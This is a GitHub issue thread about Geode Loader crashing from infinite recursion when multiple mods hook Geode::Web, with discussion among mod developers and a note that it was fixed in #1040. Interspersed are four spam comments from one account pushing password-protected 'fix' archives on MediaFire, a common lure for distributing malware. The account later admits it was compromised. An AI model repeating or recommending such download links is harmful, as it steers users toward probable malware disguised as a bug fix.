### ISSUE TITLE
Infinite recursion when hooking Geode::Web

### ISSUE THREAD

**Issue by SorkoPiko** [geode-sdk/geode#1055]
### Geode Issue

- [X] I confirm that this bug is NOT related to a mod but directly to Geode Loader itself.

### Platform

Windows

### SDK commit

e5dd2c9

### Geode Version

v3.4.0

### Mods Installed

sorkopiko.noratelimit v1.0.2, smjs.gdintercept v0.5.4-alpha.5

### Expected Behavior

Game launches normally

### Actual Behavior

Game crashes

### Steps to Reproduce

I launched the game

### Additional Information

This is caused due to infinite recursion when multiple mods are hooking Geode::Web. This is a major issue, as lots of mods are currently incompatible due to them hooking Geode::Web and this is causing lots of issues.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qimiko** [comment]
this is probably a duplicate of #994 but i'm not sure if "won't fix because it's not something we can fix" is a satisfying answer in this case

mods should really stop hooking geode web though :(

**Comment by SorkoPiko** [comment]
> mods should really stop hooking geode web though :(

simply saying they should stop seems a bit useless. i'm pretty sure noratelimit and smjs's gdintercept couldn't have performed their actions without hooking geode web. smjs was already working on a fix for this but that was 2-3 weeks ago so i assume thats been dropped

**Comment by Kingminer7** [comment]
GDPS Switcher also faces a similar issue for the same reason. With No Rate Limit, it crashes, although with GDIntercept it just never sends web requests.

Although I do plan to rework GDPS Switcher in a way that doesn't require hooking geode web, it is something I want to note

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by SorkoPiko** [comment]
fixed in #1040

**Comment by amir1387aht** [comment]
Guys Please Listen To Me. I Think Im Hacked, Please Don't Open That Link I Send, I Changed My Password But Please Don't Trust Links From Me
